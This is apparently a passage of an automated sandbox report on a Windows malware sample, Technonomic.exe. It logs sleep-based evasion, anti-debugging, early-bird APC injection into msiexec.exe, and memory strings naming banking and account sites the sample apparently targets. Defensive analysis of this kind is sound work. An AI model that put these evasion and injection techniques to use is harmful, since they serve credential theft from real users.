Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597073	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5431			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4308			Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2308	Thread sleep count: 1132 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -599751s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2308	Thread sleep count: 8726 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -599515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598711s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598280s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -597073s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -594999s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -594671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632	Thread sleep time: -594562s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe	Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405974
Source: C:\Users\user\Desktop\Technonomic.exe	Code function: 0_2_004064C6 FindFirstFileW,FindClose,	0_2_004064C6
Source: C:\Users\user\Desktop\Technonomic.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599751	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598711	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598280	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597073	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: msiexec.exe, 00000007.00000002.2606714921.0000000009F14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: msiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd2581d8da2c05<
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2606714921.0000000009EAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd2558e4eafe83<
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\Technonomic.exe	API call chain: ExitProcess graph end node			graph_0-3613
Source: C:\Users\user\Desktop\Technonomic.exe	API call chain: ExitProcess graph end node			graph_0-3605

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\msiexec.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 7_2_032A5362 LdrInitializeThunk,

7_2_032A5362

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4540000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
